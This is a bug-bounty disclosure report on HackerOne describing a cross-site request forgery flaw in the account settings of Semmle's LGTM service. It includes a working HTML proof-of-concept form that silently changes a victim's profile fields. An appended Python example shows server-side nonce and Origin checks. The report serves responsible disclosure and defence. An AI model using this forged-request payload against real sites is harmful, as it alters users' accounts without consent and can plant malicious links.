Semmle: Authenticated Cross-Site-Request-Forgery

ID H1:505595
Type hackerone
Reporter drspitfire
Modified 2019-03-19T13:13:44


Summary: I have read the T&C to be eligible for bounty on this program. As per the T&C, authenticated CSRF requests are eligible for a bounty. I am not looking for the bounty; however, I want to give you an update on an authenticated CSRF that I have found. In the "Account Settings", a user can change his username, Location, Website and Company name. This information can be changed by an adversary using a CSRF attack. Please follow the steps given below.

Steps To Reproduce:

Step1: Copy and paste the code below and save it as an HTML file.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="name" value="Wasim Shaikh" />
      <input type="hidden" name="username" value="spitfirehunt" />
      <input type="hidden" name="location" value="Jeddah" />
      <input type="hidden" name="website" value="" />
      <input type="hidden" name="organization" value="Blogspot" />
      <input type="hidden" name="nonce" value="5c04dc5f1a3327b091ecff05604bca8d22233583d0a632a01b16de290efe38b6a4fd5117fcb1d33534356da3c3242de2c236df52cb8a222c6e772c46fc64c2a2" />
      <input type="hidden" name="apiVersion" value="6526f3837c6050e2cc7ab97e8abf9cd01f4c7002" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Step2: Login using your legitimate account @LGTM-

Step3: Open the HTML file using the same browser where you have an active session for LGTM.

Step4: Click on the "Submit" button and your information in the personal profile will be changed.

Kindly let me know if you are able to reproduce the issue or not.


Security Impact:

1: Changing the username of a user on his behalf.
2: Adding a malicious website's link to a user's account.
3: User might visit malicious websites considering it is there on his account to check it and thus, end up downloading malicious software on his machine, phishing attacks or much more.
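
A server-side check that would reject the form above, given as an added example that is not part of the original report and is not Semmle's code: it ties the `nonce` field to the submitting session and verifies the request's Origin before the profile update is accepted. The server key, allowed origin, session IDs and function names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)        # assumption: per-deployment secret
ALLOWED_ORIGINS = {"https://app.example"}   # placeholder origin, not the real site


def _mac(session_id: str, salt: str) -> str:
    msg = f"{session_id}|{salt}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_nonce(session_id: str) -> str:
    """Nonce = salt + HMAC(key, session|salt), so it is valid for one session only."""
    salt = secrets.token_hex(16)
    return f"{salt}.{_mac(session_id, salt)}"


def nonce_matches_session(session_id: str, nonce: str) -> bool:
    salt, sep, mac = nonce.partition(".")
    if not (sep and salt and mac):
        return False
    # Constant-time comparison on bytes avoids leaking how many characters match.
    return hmac.compare_digest(_mac(session_id, salt).encode(), mac.encode())


def same_site_origin(headers: dict) -> bool:
    """Accept only requests whose Origin (or Referer fallback) is allow-listed."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source or source == "null":
        return False  # opaque origins, such as a saved HTML file, serialize as "null"
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" in ALLOWED_ORIGINS


def allow_profile_update(session_id: str, headers: dict, form: dict) -> bool:
    """Gate for the state-changing POST: both checks must pass."""
    return same_site_origin(headers) and nonce_matches_session(
        session_id, form.get("nonce", "")
    )
```

A nonce that is issued for one session and replayed in another fails the HMAC check, and a form submitted from a local file fails the Origin check, so either control alone would stop the reported request.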